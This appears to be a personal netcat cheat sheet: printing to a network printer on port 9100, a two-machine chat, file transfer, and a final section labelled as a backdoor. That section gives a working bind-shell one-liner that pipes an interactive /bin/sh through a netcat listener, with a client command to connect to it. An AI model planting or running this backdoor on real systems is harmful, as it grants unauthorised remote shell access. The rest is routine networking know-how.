A computer networking utility used for reading and writing to TCP and UDP connections.
Also known as the networking Swiss Army Knife.
_____________________________________________________________________
THIS SEGMENT IS FOR USING NETCAT TO PRINT A FILE USING A HP PRINTER
telnet printerIP      ie    telent 10.18.68.143
at the prompt the / will give lots of information about the printer
if printer supports postscript install a2ps or anyother tool to convert file to postscript actually doing it:
a2ps myasciifile.txt -o mypsfile.ps  # takes ascii file and converts to postscript
You need to know the port the printer your working with is listening on
cat mypsfile.ps | nc 10.14.15.16 9100
___________
Another way to do this
nc 10.14.15.16 9100
hello
world
ctrl-c
The formatting will be off in the printer output
You can embed carriage returns in a file as such if needed for whatever special reason
in Vim
Shift A - from command puts you into insert append
ctrl-v - tells vim next key should be input literally
enter
File with embeded carriage return
____________________________________________________________________________
NETCAT MESSENGER
person recieving the message nc -l -p 4500     #and make sure the port is open on firewall!
the sender nc 192.168.1.234 4500    # after you type and press enter message is sent
_____________________________________________________________________________
NETCAT FILE TRANSFER
nc -l -p 3000 > receivingfile.txt
cat sendingfile.txt | nc 192.168.1.234
_______________________________________________________________________________
NETCAT TELNET SERVER   BACKDOOR
rm -f /tmp/f; mkfifo /tmp/f
cat /tmp/f | /bin/sh -i 2>&1 | nc -l -p 3000 > /tmp/f   #bash has interesting differences
client nc backdoorip 3000
_________________________________________________________________________________
